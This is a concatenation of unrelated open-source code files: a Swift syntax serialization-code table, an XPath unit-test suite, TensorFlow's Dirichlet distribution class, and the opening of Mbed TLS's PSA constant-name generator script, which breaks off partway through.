'IfConfigDecl': 5,
'PoundErrorDecl': 6,
'PoundWarningDecl': 7,
'PoundSourceLocation': 8,
'ClassDecl': 9,
'StructDecl': 10,
'ProtocolDecl': 11,
'ExtensionDecl': 12,
'FunctionDecl': 13,
'InitializerDecl': 14,
'DeinitializerDecl': 15,
'SubscriptDecl': 16,
'ImportDecl': 17,
'AccessorDecl': 18,
'VariableDecl': 19,
'EnumCaseDecl': 20,
'EnumDecl': 21,
'OperatorDecl': 22,
'PrecedenceGroupDecl': 23,
'UnknownExpr': 24,
'InOutExpr': 25,
'PoundColumnExpr': 26,
'TryExpr': 27,
'AwaitExpr': 249,
'IdentifierExpr': 28,
'SuperRefExpr': 29,
'NilLiteralExpr': 30,
'DiscardAssignmentExpr': 31,
'AssignmentExpr': 32,
'SequenceExpr': 33,
'PoundLineExpr': 34,
'PoundFileExpr': 35,
'PoundFunctionExpr': 36,
'PoundDsohandleExpr': 37,
'SymbolicReferenceExpr': 38,
'PrefixOperatorExpr': 39,
'BinaryOperatorExpr': 40,
'ArrowExpr': 41,
'FloatLiteralExpr': 42,
'TupleExpr': 43,
'ArrayExpr': 44,
'DictionaryExpr': 45,
'ImplicitMemberExpr': 46,
'IntegerLiteralExpr': 47,
'StringLiteralExpr': 48,
'BooleanLiteralExpr': 49,
'TernaryExpr': 50,
'MemberAccessExpr': 51,
'DotSelfExpr': 52,
'IsExpr': 53,
'AsExpr': 54,
'TypeExpr': 55,
'ClosureExpr': 56,
'UnresolvedPatternExpr': 57,
'FunctionCallExpr': 58,
'SubscriptExpr': 59,
'OptionalChainingExpr': 60,
'ForcedValueExpr': 61,
'PostfixUnaryExpr': 62,
'SpecializeExpr': 63,
'KeyPathExpr': 65,
'KeyPathBaseExpr': 66,
'ObjcKeyPathExpr': 67,
'ObjcSelectorExpr': 68,
'EditorPlaceholderExpr': 69,
'ObjectLiteralExpr': 70,
'UnknownStmt': 71,
'ContinueStmt': 72,
'WhileStmt': 73,
'DeferStmt': 74,
'ExpressionStmt': 75,
'RepeatWhileStmt': 76,
'GuardStmt': 77,
'ForInStmt': 78,
'SwitchStmt': 79,
'DoStmt': 80,
'ReturnStmt': 81,
'FallthroughStmt': 82,
'BreakStmt': 83,
'DeclarationStmt': 84,
'ThrowStmt': 85,
'IfStmt': 86,
'Decl': 87,
'Expr': 88,
'Stmt': 89,
'Type': 90,
'Pattern': 91,
'CodeBlockItem': 92,
'CodeBlock': 93,
'DeclNameArgument': 94,
'DeclNameArguments': 95,
# removed: 'FunctionCallArgument': 96,
'TupleExprElement': 97,
'ArrayElement': 98,
'DictionaryElement': 99,
'ClosureCaptureItem': 100,
'ClosureCaptureSignature': 101,
'ClosureParam': 102,
'ClosureSignature': 103,
'StringSegment': 104,
'ExpressionSegment': 105,
'ObjcNamePiece': 106,
'TypeInitializerClause': 107,
'ParameterClause': 108,
'ReturnClause': 109,
'FunctionSignature': 110,
'IfConfigClause': 111,
'PoundSourceLocationArgs': 112,
'DeclModifier': 113,
'InheritedType': 114,
'TypeInheritanceClause': 115,
'MemberDeclBlock': 116,
'MemberDeclListItem': 117,
'SourceFile': 118,
'InitializerClause': 119,
'FunctionParameter': 120,
'AccessLevelModifier': 121,
'AccessPathComponent': 122,
'AccessorParameter': 123,
'AccessorBlock': 124,
'PatternBinding': 125,
'EnumCaseElement': 126,
'OperatorPrecedenceAndTypes': 127,
'PrecedenceGroupRelation': 128,
'PrecedenceGroupNameElement': 129,
'PrecedenceGroupAssignment': 130,
'PrecedenceGroupAssociativity': 131,
'Attribute': 132,
'LabeledSpecializeEntry': 133,
'ImplementsAttributeArguments': 134,
'ObjCSelectorPiece': 135,
'WhereClause': 136,
'ConditionElement': 137,
'AvailabilityCondition': 138,
'MatchingPatternCondition': 139,
'OptionalBindingCondition': 140,
'ElseIfContinuation': 141,
'ElseBlock': 142,
'SwitchCase': 143,
'SwitchDefaultLabel': 144,
'CaseItem': 145,
'SwitchCaseLabel': 146,
'CatchClause': 147,
'GenericWhereClause': 148,
'SameTypeRequirement': 149,
'GenericParameter': 150,
'GenericParameterClause': 151,
'ConformanceRequirement': 152,
'CompositionTypeElement': 153,
'TupleTypeElement': 154,
'GenericArgument': 155,
'GenericArgumentClause': 156,
'TypeAnnotation': 157,
'TuplePatternElement': 158,
'AvailabilityArgument': 159,
'AvailabilityLabeledArgument': 160,
'AvailabilityVersionRestriction': 161,
'VersionTuple': 162,
'CodeBlockItemList': 163,
# removed: 'FunctionCallArgumentList': 164,
'TupleExprElementList': 165,
'ArrayElementList': 166,
'DictionaryElementList': 167,
'StringLiteralSegments': 168,
'DeclNameArgumentList': 169,
'ExprList': 170,
'ClosureCaptureItemList': 171,
'ClosureParamList': 172,
'ObjcName': 173,
'FunctionParameterList': 174,
'IfConfigClauseList': 175,
'InheritedTypeList': 176,
'MemberDeclList': 177,
'ModifierList': 178,
'AccessPath': 179,
'AccessorList': 180,
'PatternBindingList': 181,
'EnumCaseElementList': 182,
'PrecedenceGroupAttributeList': 183,
'PrecedenceGroupNameList': 184,
'TokenList': 185,
'NonEmptyTokenList': 186,
'AttributeList': 187,
'SpecializeAttributeSpecList': 188,
'ObjCSelector': 189,
'SwitchCaseList': 190,
'CatchClauseList': 191,
'CaseItemList': 192,
'ConditionElementList': 193,
'GenericRequirementList': 194,
'GenericParameterList': 195,
'CompositionTypeElementList': 196,
'TupleTypeElementList': 197,
'GenericArgumentList': 198,
'TuplePatternElementList': 199,
'AvailabilitySpecList': 200,
'UnknownPattern': 201,
'EnumCasePattern': 202,
'IsTypePattern': 203,
'OptionalPattern': 204,
'IdentifierPattern': 205,
'AsTypePattern': 206,
'TuplePattern': 207,
'WildcardPattern': 208,
'ExpressionPattern': 209,
'ValueBindingPattern': 210,
'UnknownType': 211,
'SimpleTypeIdentifier': 212,
'MemberTypeIdentifier': 213,
'ClassRestrictionType': 214,
'ArrayType': 215,
'DictionaryType': 216,
'MetatypeType': 217,
'OptionalType': 218,
'ImplicitlyUnwrappedOptionalType': 219,
'CompositionType': 220,
'TupleType': 221,
'FunctionType': 222,
'AttributedType': 223,
'YieldStmt': 224,
'YieldList': 225,
'IdentifierList': 226,
'NamedAttributeStringArgument': 227,
'DeclName': 228,
'PoundAssertStmt': 229,
'SomeType': 230,
'CustomAttribute': 231,
'GenericRequirement': 232,
'DifferentiableAttributeArguments': 233,
'DifferentiabilityParamsClause': 234,
'DifferentiabilityParams': 235,
'DifferentiabilityParamList': 236,
'DifferentiabilityParam': 237,
# removed: 'DifferentiableAttributeFuncSpecifier': 238,
'FunctionDeclName': 239,
'PoundFilePathExpr': 240,
'DerivativeRegistrationAttributeArguments': 241,
'QualifiedDeclName': 242,
'CatchItem': 243,
'CatchItemList': 244,
'MultipleTrailingClosureElementList': 245,
'MultipleTrailingClosureElement': 246,
'PoundFileIDExpr': 247,
'TargetFunctionEntry': 248,
}
def verify_syntax_node_serialization_codes(nodes, serialization_codes):
# Verify that all nodes have serialization codes
for node in nodes:
if not node.is_base() and node.syntax_kind not in serialization_codes:
error('Node %s has no serialization code' % node.syntax_kind)
# Verify that no serialization code is used twice
used_codes = set()
for serialization_code in serialization_codes.values():
if serialization_code in used_codes:
error("Serialization code %d used twice" % serialization_code)
used_codes.add(serialization_code)
def get_serialization_code(syntax_kind):
return SYNTAX_NODE_SERIALIZATION_CODES[syntax_kind]
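# A minimal, self-contained sketch (hypothetical; the real node definitions
# come from the surrounding package) of what the checks above verify:
#
#   class FakeNode(object):
#       def __init__(self, syntax_kind, base=False):
#           self.syntax_kind = syntax_kind
#           self._base = base
#       def is_base(self):
#           return self._base
#
#   nodes = [FakeNode('ClassDecl'), FakeNode('Decl', base=True)]
#   verify_syntax_node_serialization_codes(nodes,
#                                          SYNTAX_NODE_SERIALIZATION_CODES)
#   get_serialization_code('ClassDecl')  # -> 9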
|
|
#!/usr/bin/env python
import unittest
import xml.dom.minidom
from dominic import xpath
class TestAbbreviations(unittest.TestCase):
"""Section 2.5: Abbreviated Syntax"""
def test_para_children(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" />
<div id="2" />
<para id="3" />
</doc>
""").documentElement
result = xpath.find('para', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1", "3"])
def test_all_children(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" />
<div id="2" />
<para id="3" />
</doc>
""").documentElement
result = xpath.find('*', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1", "2", "3"])
def test_text_children(self):
doc = xml.dom.minidom.parseString("""
<doc>This is <i>some</i> text.</doc>
""").documentElement
result = xpath.find('text()', doc)
self.failUnlessEqual([x.data for x in result],
["This is ", " text."])
def test_named_attribute(self):
doc = xml.dom.minidom.parseString("""
<doc name="foo" value="bar" />
""").documentElement
result = xpath.find('@name', doc)
self.failUnlessEqual([(x.name, x.value) for x in result],
[('name', 'foo')])
def test_all_attributes(self):
doc = xml.dom.minidom.parseString("""
<doc name="foo" value="bar" />
""").documentElement
result = xpath.find('@*', doc)
self.failUnlessEqual([(x.name, x.value) for x in result],
[('name', 'foo'), ('value', 'bar')])
def test_first_child(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" /><para id="2" /><para id="3" />
</doc>
""").documentElement
result = xpath.find('para[1]', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1"])
def test_last_child(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" /><para id="2" /><para id="3" />
</doc>
""").documentElement
result = xpath.find('para[last()]', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["3"])
def test_grandchildren(self):
doc = xml.dom.minidom.parseString("""
<doc>
<chapter><para id="1" /><para id="2" /></chapter>
<section><para id="3" /><sub><para id="4" /></sub></section>
<para id="4" />
</doc>
""").documentElement
result = xpath.find('*/para', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1", "2", "3"])
def test_section_5_2(self):
doc = xml.dom.minidom.parseString("""
<doc>
<chapter id="1" /><chapter id="2" /><chapter id="3" />
<chapter id="4">
<section id="4.1" /><section id="4.2" /><section id="4.3" />
</chapter>
<chapter id="5">
<section id="5.1" /><section id="5.2" /><section id="5.3" />
</chapter>
</doc>
""").documentElement
result = xpath.find('/doc/chapter[5]/section[2]', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["5.2"])
def test_child_descendant(self):
doc = xml.dom.minidom.parseString("""
<doc>
<chapter><para id="1" /><para id="2" /></chapter>
<chapter><section><para id="3" /></section></chapter>
<para id="4" />
</doc>
""").documentElement
result = xpath.find('chapter//para', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1", "2", "3"])
def test_absolute_descendant_or_self(self):
doc = xml.dom.minidom.parseString("""
<para id="0">
<div id="1" />
<para id="2">
<para id="3" />
</para>
</para>
""").documentElement
node = xpath.findnode('//para[@id="2"]', doc)
result = xpath.find('//para', node)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["0", "2", "3"])
def test_olist_item(self):
doc = xml.dom.minidom.parseString("""
<doc>
<item id="1">
<context />
<olist><item id="2" /></olist>
</item>
<olist><item id="3" /></olist>
</doc>
""").documentElement
node = xpath.findnode('//context', doc)
result = xpath.find('//olist/item', node)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["2", "3"])
def test_self(self):
doc = xml.dom.minidom.parseString("""
<doc id="0">
<para id="1"/>
</doc>
""").documentElement
result = xpath.find('.', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["0"])
def test_relative_descendant_or_self(self):
doc = xml.dom.minidom.parseString("""
<para id="0">
<div id="1" />
<para id="2">
<para id="3" />
</para>
</para>
""").documentElement
node = xpath.findnode('//para[@id="2"]', doc)
result = xpath.find('.//para', node)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["3"])
def test_parent(self):
doc = xml.dom.minidom.parseString("""
<doc id="0">
<chapter id="1">
<item id="2" />
<item id="3"><subitem id="4" /></item>
</chapter>
</doc>
""").documentElement
node = xpath.findnode('//item[@id="3"]', doc)
result = xpath.find('..', node)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1"])
def test_parent_attr(self):
doc = xml.dom.minidom.parseString("""
<doc id="0">
<chapter id="1" lang="en">
<item id="2" />
<item id="3"><subitem id="4" /></item>
</chapter>
</doc>
""").documentElement
node = xpath.findnode('//item[@id="3"]', doc)
result = xpath.find('../@lang', node)
self.failUnlessEqual([x.value for x in result],
["en"])
def test_attr_equal(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" type="info" />
<para id="2" type="warning" />
<para id="3" type="warning" />
<para id="4" type="error" />
</doc>
""").documentElement
result = xpath.find('para[@type="warning"]', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["2", "3"])
def test_fifth_warning(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" type="info" />
<para id="2" type="warning" />
<para id="3" type="warning" />
<para id="4" type="warning" />
<para id="5" type="error" />
<para id="6" type="warning" />
<para id="7" type="warning" />
</doc>
""").documentElement
result = xpath.find(
'para[@type="warning"][5]', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["7"])
def test_fifth_if_warning(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" type="info" />
<para id="2" type="warning" />
<para id="3" type="warning" />
<para id="4" type="warning" />
<para id="5" type="error" />
<para id="6" type="warning" />
<para id="7" type="warning" />
</doc>
""").documentElement
result = xpath.find(
'para[5][@type="warning"]', doc)
self.failUnlessEqual(result, [])
def test_introductions(self):
doc = xml.dom.minidom.parseString("""
<doc>
<chapter id="1" />
<chapter id="2"><title>Introduction</title></chapter>
<chapter id="3"><title>Body</title></chapter>
<chapter id="4">
<title>Another</title>
<title>Introduction</title>
</chapter>
</doc>
""").documentElement
result = xpath.find("chapter[title='Introduction']", doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["2", "4"])
def test_titles(self):
doc = xml.dom.minidom.parseString("""
<doc>
<chapter id="1" />
<chapter id="2"><title /></chapter>
<chapter id="3"><title /><title /></chapter>
</doc>
""").documentElement
result = xpath.find("chapter[title]", doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["2", "3"])
def test_secretary_and_assistant(self):
doc = xml.dom.minidom.parseString("""
<doc>
<employee name="Alice" />
<employee name="Bob" secretary="Cathy" />
<employee name="Dianne" secretary="Edward" assistant="Fran" />
</doc>
""").documentElement
result = xpath.find("employee[@secretary and @assistant]", doc)
self.failUnlessEqual([x.getAttribute("name") for x in result],
["Dianne"])
if __name__ == '__main__':
unittest.main()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Dirichlet distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import special_math_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import util as distribution_util
__all__ = [
"Dirichlet",
]
_dirichlet_sample_note = """Note: `value` must be a non-negative tensor with
dtype `self.dtype` and be in the `(self.event_shape() - 1)`-simplex, i.e.,
`tf.reduce_sum(value, -1) = 1`. It must have a shape compatible with
`self.batch_shape() + self.event_shape()`."""
class Dirichlet(distribution.Distribution):
"""Dirichlet distribution.
The Dirichlet distribution is defined over the
[`(k-1)`-simplex](https://en.wikipedia.org/wiki/Simplex) using a positive,
length-`k` vector `concentration` (`k > 1`). The Dirichlet is identically the
Beta distribution when `k = 2`.
#### Mathematical Details
The Dirichlet is a distribution over the open `(k-1)`-simplex, i.e.,
```none
S^{k-1} = { (x_0, ..., x_{k-1}) in R^k : sum_j x_j = 1 and all_j x_j > 0 }.
```
The probability density function (pdf) is,
```none
pdf(x; alpha) = prod_j x_j**(alpha_j - 1) / Z
Z = prod_j Gamma(alpha_j) / Gamma(sum_j alpha_j)
```
where:
* `x in S^{k-1}`, i.e., the `(k-1)`-simplex,
* `concentration = alpha = [alpha_0, ..., alpha_{k-1}]`, `alpha_j > 0`,
* `Z` is the normalization constant aka the [multivariate beta function](
https://en.wikipedia.org/wiki/Beta_function#Multivariate_beta_function),
and,
* `Gamma` is the [gamma function](
https://en.wikipedia.org/wiki/Gamma_function).
The `concentration` represents mean total counts of class occurrence, i.e.,
```none
concentration = alpha = mean * total_concentration
```
where `mean` in `S^{k-1}` and `total_concentration` is a positive real number
representing a mean total count.
Distribution parameters are automatically broadcast in all functions; see
examples for details.
#### Examples
```python
# Create a single trivariate Dirichlet, with the 3rd class being three times
# more frequent than the first. I.e., batch_shape=[], event_shape=[3].
alpha = [1., 2, 3]
dist = Dirichlet(alpha)
dist.sample([4, 5]) # shape: [4, 5, 3]
# x has one sample, one batch, three classes:
x = [.2, .3, .5] # shape: [3]
dist.prob(x) # shape: []
# x has two samples from one batch:
x = [[.1, .4, .5],
[.2, .3, .5]]
dist.prob(x) # shape: [2]
# alpha will be broadcast to shape [5, 7, 3] to match x.
x = [[...]] # shape: [5, 7, 3]
dist.prob(x) # shape: [5, 7]
```
```python
# Create batch_shape=[2], event_shape=[3]:
alpha = [[1., 2, 3],
[4, 5, 6]] # shape: [2, 3]
dist = Dirichlet(alpha)
dist.sample([4, 5]) # shape: [4, 5, 2, 3]
x = [.2, .3, .5]
# x will be broadcast as [[.2, .3, .5],
# [.2, .3, .5]],
# thus matching batch_shape [2, 3].
dist.prob(x) # shape: [2]
```
"""
def __init__(self,
concentration,
validate_args=False,
allow_nan_stats=True,
name="Dirichlet"):
"""Initialize a batch of Dirichlet distributions.
Args:
concentration: Positive floating-point `Tensor` indicating mean number
of class occurrences; aka "alpha". Implies `self.dtype`, and
`self.batch_shape`, `self.event_shape`, i.e., if
`concentration.shape = [N1, N2, ..., Nm, k]` then
`batch_shape = [N1, N2, ..., Nm]` and
`event_shape = [k]`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = locals()
with ops.name_scope(name, values=[concentration]):
self._concentration = self._maybe_assert_valid_concentration(
ops.convert_to_tensor(concentration, name="concentration"),
validate_args)
self._total_concentration = math_ops.reduce_sum(self._concentration, -1)
super(Dirichlet, self).__init__(
dtype=self._concentration.dtype,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
parameters=parameters,
graph_parents=[self._concentration,
self._total_concentration],
name=name)
@property
def concentration(self):
"""Concentration parameter; expected counts for that coordinate."""
return self._concentration
@property
def total_concentration(self):
"""Sum of last dim of concentration parameter."""
return self._total_concentration
def _batch_shape_tensor(self):
return array_ops.shape(self.total_concentration)
def _batch_shape(self):
return self.total_concentration.get_shape()
def _event_shape_tensor(self):
return array_ops.shape(self.concentration)[-1:]
def _event_shape(self):
return self.concentration.get_shape().with_rank_at_least(1)[-1:]
def _sample_n(self, n, seed=None):
gamma_sample = random_ops.random_gamma(
shape=[n],
alpha=self.concentration,
dtype=self.dtype,
seed=seed)
return gamma_sample / math_ops.reduce_sum(gamma_sample, -1, keep_dims=True)
@distribution_util.AppendDocstring(_dirichlet_sample_note)
def _log_prob(self, x):
return self._log_unnormalized_prob(x) - self._log_normalization()
@distribution_util.AppendDocstring(_dirichlet_sample_note)
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _log_unnormalized_prob(self, x):
x = self._maybe_assert_valid_sample(x)
return math_ops.reduce_sum((self.concentration - 1.) * math_ops.log(x), -1)
def _log_normalization(self):
return special_math_ops.lbeta(self.concentration)
def _entropy(self):
k = math_ops.cast(self.event_shape_tensor()[0], self.dtype)
return (
self._log_normalization()
+ ((self.total_concentration - k)
* math_ops.digamma(self.total_concentration))
- math_ops.reduce_sum(
(self.concentration - 1.) * math_ops.digamma(self.concentration),
axis=-1))
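  # (Closed form used above: H = log B(alpha)
  #  + (alpha_0 - k) * digamma(alpha_0)
  #  - sum_j (alpha_j - 1) * digamma(alpha_j),
  #  where alpha_0 = total_concentration and k is the event size.)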
def _mean(self):
return self.concentration / self.total_concentration[..., array_ops.newaxis]
def _covariance(self):
x = self._variance_scale_term() * self._mean()
return array_ops.matrix_set_diag(
-math_ops.matmul(x[..., array_ops.newaxis],
x[..., array_ops.newaxis, :]), # outer prod
self._variance())
def _variance(self):
scale = self._variance_scale_term()
x = scale * self._mean()
return x * (scale - x)
def _variance_scale_term(self):
"""Helper to `_covariance` and `_variance` which computes a shared scale."""
return math_ops.rsqrt(1. + self.total_concentration[..., array_ops.newaxis])
@distribution_util.AppendDocstring(
"""Note: The mode is undefined when any `concentration <= 1`. If
`self.allow_nan_stats` is `True`, `NaN` is used for undefined modes. If
`self.allow_nan_stats` is `False` an exception is raised when one or more
modes are undefined.""")
def _mode(self):
k = math_ops.cast(self.event_shape_tensor()[0], self.dtype)
mode = (self.concentration - 1.) / (
self.total_concentration[..., array_ops.newaxis] - k)
if self.allow_nan_stats:
nan = array_ops.fill(
array_ops.shape(mode),
np.array(np.nan, dtype=self.dtype.as_numpy_dtype()),
name="nan")
return array_ops.where(
math_ops.reduce_all(self.concentration > 1., axis=-1),
mode, nan)
return control_flow_ops.with_dependencies([
check_ops.assert_less(
array_ops.ones([], self.dtype),
self.concentration,
message="Mode undefined when any concentration <= 1"),
], mode)
def _maybe_assert_valid_concentration(self, concentration, validate_args):
"""Checks the validity of the concentration parameter."""
if not validate_args:
return concentration
return control_flow_ops.with_dependencies([
check_ops.assert_positive(
concentration,
message="Concentration parameter must be positive."),
check_ops.assert_rank_at_least(
concentration, 1,
message="Concentration parameter must have >=1 dimensions."),
check_ops.assert_less(
1, array_ops.shape(concentration)[-1],
message="Concentration parameter must have event_size >= 2."),
], concentration)
def _maybe_assert_valid_sample(self, x):
"""Checks the validity of a sample."""
if not self.validate_args:
return x
return control_flow_ops.with_dependencies([
check_ops.assert_positive(
x,
message="samples must be positive"),
distribution_util.assert_close(
array_ops.ones([], dtype=self.dtype),
math_ops.reduce_sum(x, -1),
message="sample last-dimension must sum to `1`"),
], x)
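# Illustrative note (not part of the original module): _sample_n relies on the
# classical construction of a Dirichlet draw as independent Gamma samples
# normalized by their sum. The same identity, checked with plain NumPy:
#
#   import numpy as np
#   alpha = np.array([1., 2., 3.])
#   g = np.random.gamma(shape=alpha, size=(100000, 3))
#   x = g / g.sum(axis=-1, keepdims=True)
#   x.mean(axis=0)  # approaches alpha / alpha.sum() = [1/6, 1/3, 1/2]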
|
|
#!/usr/bin/env python3
"""Generate psa_constant_names_generated.c
which is included by programs/psa/psa_constant_names.c.
The code generated by this module is only meant to be used in the context
of that program.
An argument passed to this script will modify the output directory where the
file is written:
* by default (no arguments passed): writes to programs/psa/
* OUTPUT_FILE_DIR passed: writes to OUTPUT_FILE_DIR/
"""
# Copyright The Mbed TLS Contributors
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
OUTPUT_TEMPLATE = '''\
/* Automatically generated by generate_psa_constant.py. DO NOT EDIT. */
static const char *psa_strerror(psa_status_t status)
{
switch (status) {
%(status_cases)s
default: return NULL;
}
}
static const char *psa_ecc_family_name(psa_ecc_family_t curve)
{
switch (curve) {
%(ecc_curve_cases)s
default: return NULL;
}
}
static const char *psa_dh_family_name(psa_dh_family_t group)
{
switch (group) {
%(dh_group_cases)s
default: return NULL;
}
}
static const char *psa_hash_algorithm_name(psa_algorithm_t hash_alg)
{
switch (hash_alg) {
%(hash_algorithm_cases)s
default: return NULL;
}
}
static const char *psa_ka_algorithm_name(psa_algorithm_t ka_alg)
{
switch (ka_alg) {
%(ka_algorithm_cases)s
default: return NULL;
}
}
static int psa_snprint_key_type(char *buffer, size_t buffer_size,
psa_key_type_t type)
{
size_t required_size = 0;
switch (type) {
%(key_type_cases)s
default:
%(key_type_code)s{
return snprintf(buffer, buffer_size,
"0x%%04x", (unsigned) type);
}
break;
}
buffer[0] = 0;
return (int) required_size;
}
#define NO_LENGTH_MODIFIER 0xfffffffflu
static int psa_snprint_algorithm(char *buffer, size_t buffer_size,
psa_algorithm_t alg)
{
size_t required_size = 0;
psa_algorithm_t core_alg = alg;
unsigned long length_modifier = NO_LENGTH_MODIFIER;
if (PSA_ALG_IS_MAC(alg)) {
core_alg = PSA_ALG_TRUNCATED_MAC(alg, 0);
if (core_alg != alg) {
append(&buffer, buffer_size, &required_size,
"PSA_ALG_TRUNCATED_MAC(", 22);
length_modifier = PSA_MAC_TRUNCATED_LENGTH(alg);
}
} else if (PSA_ALG_IS_AEAD(alg)) {
core_alg = PSA_ALG_AEAD_WITH_DEFAULT_TAG_LENGTH(alg);
if (core_alg == 0) {
/* For unknown AEAD algorithms, there is no "default tag length". */
core_alg = alg;
} else if (core_alg != alg) {
append(&buffer, buffer_size, &required_size,
"PSA_ALG_AEAD_WITH_TAG_LENGTH(", 29);
length_modifier = PSA_AEAD_TAG_LENGTH(alg);
}
} else if (PSA_ALG_IS_KEY_AGREEMENT(alg) &&
!PSA_ALG_IS_RAW_KEY_AGREEMENT(alg)) {
core_alg = PSA_ALG_KEY_AGREEMENT_GET_KDF(alg);
append(&buffer, buffer_size, &required_size,
"PSA_ALG_KEY_AGREEMENT(", 22);
append_with_alg(&buffer, buffer_size, &required_size,
psa_ka_algorithm_name,
PSA_ALG_KEY_AGREEMENT_GET_BASE(alg));
append(&buffer, buffer_size, &required_size, ", ", 2);
}
switch (core_alg) {
%(algorithm_cases)s
default:
%(algorithm_code)s{
append_integer(&buffer, buffer_size, &required_size,
"0x%%08lx", (unsigned long) core_alg);
}
break;
}
if (core_alg != alg) {
if (length_modifier != NO_LENGTH_MODIFIER) {
append(&buffer, buffer_size, &required_size, ", ", 2);
append_integer(&buffer, buffer_size, &required_size,
"%%lu", length_modifier);
}
append(&buffer, buffer_size, &required_size, ")", 1);
}
buffer[0] = 0;
return (int) required_size;
}
static int psa_snprint_key_usage(char *buffer, size_t buffer_size,
psa_key_usage_t usage)
{
size_t required_size = 0;
if (usage == 0) {
if (buffer_size > 1) {
buffer[0] = '0';
buffer[1] = 0;
} else if (buffer_size == 1) {
buffer[0] = 0;
}
return 1;
}
%(key_usage_code)s
if (usage != 0) {
if (required_size != 0) {
append(&buffer, buffer_size, &required_size, " | ", 3);
}
append_integer(&buffer, buffer_size, &required_size,
"0x%%08lx", (unsigned long) usage);
} else {
buffer[0] = 0;
}
return (int) required_size;
}
/* End of automatically generated file. */
'''
KEY_TYPE_FROM_CURVE_TEMPLATE = '''if (%(tester)s(type)) {
append_with_curve(&buffer, buffer_size, &required_size,
"%(builder)s", %(builder_length)s,
PSA_KEY_TYPE_ECC_GET_FAMILY(type));
} else '''
KEY_TYPE_FROM_GROUP_TEMPLATE = '''if (%(tester)s(type)) {
append_with_group(&buffer, buffer_size, &required_size,
"%(builder)s", %(builder_length)s,
PSA_KEY_TYPE_DH_GET_FAMILY(type));
} else '''
ALGORITHM_FROM_HASH_TEMPLATE = '''if (%(tester)s(core_alg)) {
append(&buffer, buffer_size, &required_size,
"%(builder)s(", %(builder_length)s + 1);
append_with_alg(&buffer, buffer_size, &required_size,
psa_hash_algorithm_name,
PSA_ALG_GET_HASH(core_alg));
append(&buffer, buffer_size, &required_size, ")", 1);
} else '''
BIT_TEST_TEMPLATE = '''\
if (%(var)s & %(flag)s) {
if (required_size != 0) {
append(&buffer, buffer_size, &required_size, " | ", 3);
}
append(&buffer, buffer_size, &required_size, "%(flag)s", %(length)d);
%(var)s ^= %(flag)s;
}\
'''
class MacroCollector:
"""Collect PSA crypto macro definitions from C header files.
1. Call `read_file` on the input header file(s).
2. Call `write_file` to write ``psa_constant_names_generated.c``.
"""
def __init__(self):
self.statuses = set()
self.key_types = set()
self.key_types_from_curve = {}
self.key_types_from_group = {}
self.ecc_curves = set()
self.dh_groups = set()
self.algorithms = set()
self.hash_algorithms = set()
self.ka_algorithms = set()
self.algorithms_from_hash = {}
self.key_usages = set()
# "#define" followed by a macro name with either no parameters
# or a single parameter and a non-empty expansion.
# Grab the macro name in group 1, the parameter name if any in group 2
# and the expansion in group 3.
_define_directive_re = re.compile(r'\s*#\s*define\s+(\w+)' +
r'(?:\s+|\((\w+)\)\s*)' +
r'(.+)')
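    # For example (illustrative):
    #   '#define PSA_SUCCESS ((psa_status_t)0)' yields
    #     name='PSA_SUCCESS', parameter=None, expansion='((psa_status_t)0)',
    #   while '#define PSA_ALG_HMAC(hash_alg) ...' captures
    #     parameter='hash_alg'.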
_deprecated_definition_re = re.compile(r'\s*MBEDTLS_DEPRECATED')
def read_line(self, line):
"""Parse a C header line and record the PSA identifier it defines if any.
This function analyzes lines that start with "#define PSA_"
